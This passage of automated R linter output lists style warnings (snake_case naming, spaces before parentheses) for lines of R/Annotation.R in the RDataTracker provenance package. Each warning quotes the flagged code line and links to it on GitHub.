^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:674:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L674) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:677:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L677) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:680:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L680) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.body <- call(\"{\", func.body)\n  ^~~~~~~~~~~~~\n```\n[R/Annotation.R:689:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L689) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.conditional.statement <- function(func.definition, func.name) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:689:44:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L689) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.conditional.statement <- function(func.definition, func.name) {\n                                           ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:689:61:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L689) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.conditional.statement <- function(func.definition, func.name) {\n                                                            ^~~~~~~~~\n```\n[R/Annotation.R:691:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L691) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:694:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L694) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:702:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L702) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.body.txt <-\n  ^~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:709:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L709) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.expr <- parse(text=new.func.body.txt)\n  ^~~~~~~~~~~~~\n```\n[R/Annotation.R:710:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L710) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.body <- new.func.expr[[1]]\n  ^~~~~~~~~~~~~\n```\n[R/Annotation.R:722:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L722) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.insert.ddg.function <- function(func.definition) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:722:38:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L722) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.insert.ddg.function <- function(func.definition) {\n                                     ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:724:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L724) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:727:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L727) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:734:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L734) *style:* **Variable or function name should be snake_case.**\n```r\n​  inserted.statement <- call(\"ddg.function\")\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:735:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L735) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.statements.txt <- c(as.list(\"{\"), inserted.statement, \n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:755:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L755) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.return.parameters <- function(block, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:755:48:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L755) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.return.parameters <- function(block, parsed.stmts) {\n                                               ^~~~~~~~~~~~\n```\n[R/Annotation.R:774:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L774) *style:* **Variable or function name should be snake_case.**\n```r\n​          ret.params <- \"\"\n          ^~~~~~~~~~\n```\n[R/Annotation.R:776:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L776) *style:* **Variable or function name should be snake_case.**\n```r\n​          ret.params <- statement[[2]]\n          ^~~~~~~~~~\n```\n[R/Annotation.R:788:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L788) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts[[i-2]]\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:793:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L793) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:800:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L800) *style:* **Variable or function name should be snake_case.**\n```r\n​          ret.params <- .ddg.wrap.return.parameters(ret.params, parsed.stmt)\n          ^~~~~~~~~~\n```\n[R/Annotation.R:803:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L803) *style:* **Variable or function name should be snake_case.**\n```r\n​        new.ret.params <- .ddg.create.ddg.return.call(ret.params, parsed.stmt)\n        ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:804:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L804) *style:* **Variable or function name should be snake_case.**\n```r\n​        new.statement <- call(\"return\", new.ret.params)\n        ^~~~~~~~~~~~~\n```\n[R/Annotation.R:814:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L814) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts[[i-2]]\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:819:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L819) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:846:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L846) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.all.return.parameters <- function(func.definition, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:846:45:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L846) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.all.return.parameters <- function(func.definition, parsed.stmts) {\n                                            ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:846:62:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L846) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.all.return.parameters <- function(func.definition, parsed.stmts) {\n                                                             ^~~~~~~~~~~~\n```\n[R/Annotation.R:848:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L848) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:851:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L851) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:873:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L873) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.find.last.statement <- function (func.definition) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:873:38:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L873) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​.ddg.find.last.statement <- function (func.definition) {\n                                     ^\n```\n[R/Annotation.R:873:39:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L873) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.find.last.statement <- function (func.definition) {\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:875:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L875) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:894:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L894) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.last.line <- function(func.definition, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:894:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L894) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.last.line <- function(func.definition, parsed.stmts) {\n                                ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:894:50:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L894) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.last.line <- function(func.definition, parsed.stmts) {\n                                                 ^~~~~~~~~~~~\n```\n[R/Annotation.R:896:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L896) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:899:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L899) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:905:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L905) *style:* **Variable or function name should be snake_case.**\n```r\n​  last.statement <- block[[pos]]\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:906:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L906) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.stmt <- parsed.stmts[[length(parsed.stmts)]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:908:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L908) *style:* **Variable or function name should be snake_case.**\n```r\n​  wrapped.statement <- .ddg.create.ddg.return.call(last.statement, parsed.stmt)\n  ^~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:922:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L922) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:922:41:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L922) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n                                        ^\n```\n[R/Annotation.R:922:42:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L922) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n                                         ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:922:58:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L922) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n                                                         ^~~~~~~~~~~\n```\n[R/Annotation.R:931:12:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L931) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", last.statement, function() parsed.stmt))\n           ^\n```\n[R/Annotation.R:931:18:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L931) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", last.statement, function() parsed.stmt))\n                 ^\n```\n[R/Annotation.R:941:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L941) *style:* **Variable or function name should be snake_case.**\n```r\n​    new.statement <- .ddg.create.ddg.eval.call(last.statement, parsed.stmt)\n    ^~~~~~~~~~~~~\n```\n[R/Annotation.R:942:12:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L942) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", new.statement, function() parsed.stmt))\n           ^\n```\n[R/Annotation.R:942:18:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L942) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", new.statement, function() parsed.stmt))\n                 ^\n```\n[R/Annotation.R:957:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L957) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.with.ddg.eval <- function(func.definition, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:957:37:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L957) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.with.ddg.eval <- function(func.definition, parsed.stmts) {\n                                    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:957:54:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L957) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.with.ddg.eval <- function(func.definition, parsed.stmts) {\n                                                     ^~~~~~~~~~~~\n```\n[R/Annotation.R:959:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L959) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:962:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L962) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:976:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L976) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.stmt <- parsed.stmts[[i-2]]\n      ^~~~~~~~~~~\n```\n[R/Annotation.R:977:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L977) *style:* **Variable or function name should be snake_case.**\n```r\n​      new.statement <- .ddg.create.ddg.eval.call(statement, parsed.stmt)\n      ^~~~~~~~~~~~~\n```\n[R/Annotation.R:989:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L989) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.if.statement <- function(command) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:992:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L992) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command.txt <- deparse(command@parsed[[1]])\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:997:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L997) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command <- command@parsed[[1]]\n    ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:998:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L998) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.stmts <- command@contained\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:1004:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1004) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command.txt <- vector()\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1013:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1013) *style:* **Variable or function name should be snake_case.**\n```r\n​      block.stmts<- list ()\n      ^~~~~~~~~~~\n```\n[R/Annotation.R:1013:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1013) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​      block.stmts<- list ()\n                         ^\n```\n[R/Annotation.R:1015:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1015) *style:* **Variable or function name should be snake_case.**\n```r\n​        block.stmts <- c(block.stmts, parsed.stmts[[i+ptr]])\n        ^~~~~~~~~~~\n```\n[R/Annotation.R:1030:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1030) *style:* **Variable or function name should be snake_case.**\n```r\n​        statement.txt <- paste(c(paste(\"if (\", cond, \")\", sep=\"\"), \n        ^~~~~~~~~~~~~\n```\n[R/Annotation.R:1033:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1033) *style:* **Variable or function name should be snake_case.**\n```r\n​        statement.txt <- paste(c(paste(\"} else if (\", cond, \")\", sep=\"\"), \n        ^~~~~~~~~~~~~\n```\n[R/Annotation.R:1040:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1040) *style:* **Variable or function name should be snake_case.**\n```r\n​        parsed.command.txt <- parsed.command.txt[c(1:last)]\n        ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1042:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1042) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.command.txt <- append(parsed.command.txt, statement.txt)\n      ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1046:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1046) *style:* **Variable or function name should be snake_case.**\n```r\n​        final.else <- TRUE\n        ^~~~~~~~~~\n```\n[R/Annotation.R:1048:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1048) *style:* **Variable or function name should be snake_case.**\n```r\n​        final.else <- FALSE\n        ^~~~~~~~~~\n```\n[R/Annotation.R:1063:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1063) *style:* **Variable or function name should be snake_case.**\n```r\n​      block.stmts <- list()\n      ^~~~~~~~~~~\n```\n[R/Annotation.R:1065:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1065) *style:* **Variable or function name should be snake_case.**\n```r\n​        block.stmts <- c(block.stmts, parsed.stmts[[i+ptr]])\n        ^~~~~~~~~~~\n```\n[R/Annotation.R:1075:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1075) *style:* **Variable or function name should be snake_case.**\n```r\n​      statement.txt <- paste(c(paste(\"} else\", sep=\"\"), deparse(block), collapse=\"\"))\n      ^~~~~~~~~~~~~\n```\n[R/Annotation.R:1079:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1079) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.command.txt <- parsed.command.txt[c(1:last)]\n      ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1080:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1080) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.command.txt <- append(parsed.command.txt, statement.txt)\n      ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1084:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1084) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command.txt <- \n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1086:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1086) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command.txt <-\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1102:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1102) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.loop.statement <- function(command, loop.type) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1102:51:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1102) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.loop.statement <- function(command, loop.type) {\n                                                  ^~~~~~~~~\n```\n[R/Annotation.R:1106:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1106) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command.txt <- deparse(command@parsed[[1]])\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1112:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1112) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command <- command@parsed[[1]]\n    ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:1115:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1115) *style:* **Variable or function name should be snake_case.**\n```r\n​    ddg.loop.num <- .ddg.add.loop()\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:1133:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1133) *style:* **Variable or function name should be snake_case.**\n```r\n​    annotated.block <- .ddg.wrap.block.with.ddg.eval(block, command@contained)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1137:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1137) *style:* **Variable or function name should be snake_case.**\n```r\n​      index.var <- parsed.command[[2]]\n      ^~~~~~~~~\n```\n[R/Annotation.R:1138:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1138) *style:* **Variable or function name should be snake_case.**\n```r\n​      annotated.block <- .ddg.insert.ddg.forloop(annotated.block, index.var)\n      ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1142:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1142) *style:* **Variable or function name should be snake_case.**\n```r\n​    annotated.block <- .ddg.add.block.start.finish(annotated.block, \n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1149:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1149) *style:* **Variable or function name should be snake_case.**\n```r\n​    block.txt <- deparse(block)\n    ^~~~~~~~~\n```\n[R/Annotation.R:1150:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1150) *style:* **Variable or function name should be snake_case.**\n```r\n​    annotated.block.txt <- deparse(annotated.block)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1154:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1154) *style:* **Variable or function name should be snake_case.**\n```r\n​      firstLine <- paste(\"for (\", deparse(parsed.command[[2]]), \" in \", \n      ^~~~~~~~~\n```\n[R/Annotation.R:1158:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1158) *style:* **Variable or function name should be snake_case.**\n```r\n​      firstLine <- paste(\"while (\", deparse(parsed.command[[2]]), \") {\", sep=\"\")\n      ^~~~~~~~~\n```\n[R/Annotation.R:1161:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1161) *style:* **Variable or function name should be snake_case.**\n```r\n​      firstLine <- paste(\"repeat {\", sep=\"\")\n      